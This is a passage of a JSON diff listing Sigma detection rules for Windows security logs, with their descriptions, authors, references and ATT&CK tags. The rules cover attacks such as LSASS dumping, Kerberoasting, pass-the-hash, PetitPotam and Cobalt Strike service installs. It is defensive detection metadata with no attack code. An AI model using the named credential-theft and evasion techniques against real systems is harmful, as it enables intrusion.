"logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "value": "Important Scheduled Task Deleted/Disabled" + }, + { + "description": "Detects rare scheduled tasks creations 
that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/23", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_security_rare_schtasks_creations.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "value": "Rare Schtasks Creations" + }, + { + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_protected_storage_service_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", + "value": "Protected Storage Service Access" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_powershell_script_installed_as_service.yml", + "level": "high", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "value": "PowerShell Scripts Installed as Services - Security" + }, + { + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "meta": { + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "creation_date": "2019/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_rdp_bluekeep_poc_scanner.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "8400629e-79a9-4737-b387-5db940ab2367", + "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" + }, + { + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/27", + "falsepositive": [ + "Valid user was not added to RDP group" + ], + "filename": "win_security_not_allowed_rdp_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "value": "Denied Access To Remote Desktop" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_security_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "value": "HybridConnectionManager Service Installation" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.persistence", + 
"attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "value": "Failed Logins with Different Accounts from Single Source System" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" + }, + { + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If source account name is not an admin then its super suspicious" + ], + "filename": "win_security_account_discovery.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "value": "AD Privileged Users or Groups Reconnaissance" + }, + { + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request 
credentials.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_replication_non_machine_account.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "17d619c1-e020-4347-957e-1d1207455c93", + "value": "Active Directory Replication from Non Machine Account" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" + ], + "tags": "No established tags" + }, + "uuid": "571498c8-908e-40b4-910b-d2369159a3da", + "value": "Password Protected ZIP File Opened (Email Attachment)" + }, + { + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. 
Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_workstation_was_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" + ], + "tags": "No established tags" + }, + "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "value": "Locked Workstation" + }, + { + "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", + "value": "Valid Users Failing to 
Authenticate From Single Source Using Kerberos" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dot_net_etw_tamper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "value": "ETW Logging Disabled In .NET Processes - Registry" + }, + { + "description": "Detects handles requested to SAM registry hive", + "meta": { + "author": 
"Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sam_registry_hive_handle_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "value": "SAM Registry Hive Handle Request" + }, + { + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_syskey_registry_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "value": "SysKey Registry Keys Access" + }, + { + "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "value": "Suspicious Scheduled Task Creation" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Programs that connect locally to the RDP port" + ], + "filename": "win_security_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "value": "RDP over Reverse SSH Tunnel WFP" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values 
and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "value": "Azure AD Health Service Agents Registry Keys Access" + }, + { + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "meta": { + "author": "sigma", + "creation_date": "2017/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_lsass_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jackcr/status/807385668833968128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + 
"value": "Password Dumper Activity on LSASS" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_teams_suspicious_objectaccess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "value": "Suspicious Teams Application Related ObjectAcess Event" + }, + { + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_enable_weak_encryption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "https://adsecurity.org/?p=2053", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "value": "Weak Encryption Enabled and Kerberoast" + }, + { + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of 
privilege escalation activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_user_added_to_local_administrators.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", + "value": "User Added to Local Administrators" + }, + { + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_hidden_user_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1387743867663958021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "value": "Hidden Local User Creation" + }, + { + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_filename.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" + ], + "tags": "No established tags" + }, + "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", + "value": "Password Protected ZIP File Opened (Suspicious Filenames)" + }, + { + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_smb_file_creation_admin_shares.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", + "value": "SMB Create Remote File Admin Share" + }, + { + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + 
"creation_date": "2020/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_camera_microphone_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "value": "Processes Accessing the Microphone and Webcam" + }, + { + "description": "Detect PetitPotam coerced authentication activity.", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown. Feedback welcomed." + ], + "filename": "win_security_petitpotam_network_share.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", + "https://github.com/topotam/PetitPotam", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "value": "Possible PetitPotam Coerce Authentication Attempt" + }, + { + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure 
that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_disable_event_logging.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", + "value": "Disabling Windows Event Auditing" + }, + { + "description": "Detects access to a domain user from a non-machine account", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2020/03/30", + "falsepositive": [ + "Administrators configuring new users." 
+ ], + "filename": "win_security_ad_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", + "value": "AD User Enumeration" + }, + { + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_ad_user_backdoors.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "value": "Active Directory User Backdoors" + }, + { + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "meta": { + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "creation_date": "2018/02/12", + "falsepositive": [ + "Runas command-line tool using /netonly parameter" + ], + "filename": "win_security_overpass_the_hash.yml", + "level": "high", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" + ] + }, + "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "value": "Successful Overpass the Hash Attempt" + }, + { + "description": "Detects possible addition of shadow credentials to an active directory object.", + "meta": { + "author": "Nasreddine Bencherchali (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + ], + "filename": "win_security_susp_possible_shadow_credentials_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556" + ] + }, + "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", + "value": "Possible Shadow Credentials Added" + }, + { + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_wceaux_dll.yml", + "level": 
"critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ] + }, + "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "value": "WCE wceaux.dll Access" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_cobaltstrike_service_installs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.sans.org/webcasts/119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": 